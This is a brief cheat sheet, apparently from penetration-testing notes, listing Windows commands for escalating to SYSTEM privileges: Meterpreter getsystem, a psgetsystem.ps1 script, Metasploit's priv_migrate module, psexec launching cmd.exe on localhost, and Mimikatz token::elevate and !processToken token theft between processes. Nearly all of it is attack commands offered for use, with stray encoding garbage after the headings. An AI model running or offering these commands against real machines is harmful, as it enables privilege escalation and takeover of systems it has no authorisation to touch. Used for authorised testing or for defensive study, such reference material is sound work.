System Privileges
Getsystemâ
getsystem
psgetsystem.ps1 <system_PID> <cmd.exe>
Process injectionâ
post/windows/manage/priv_migrate
Psexecâ
psexec \\127.0.0.1 cmd.exe
Mimikatzâ
Modify the thread token
token::elevate
Modify the process token
+!
!processToken /from:<PID such as 0. It takes the token from the PID> /to:<PID to give the token>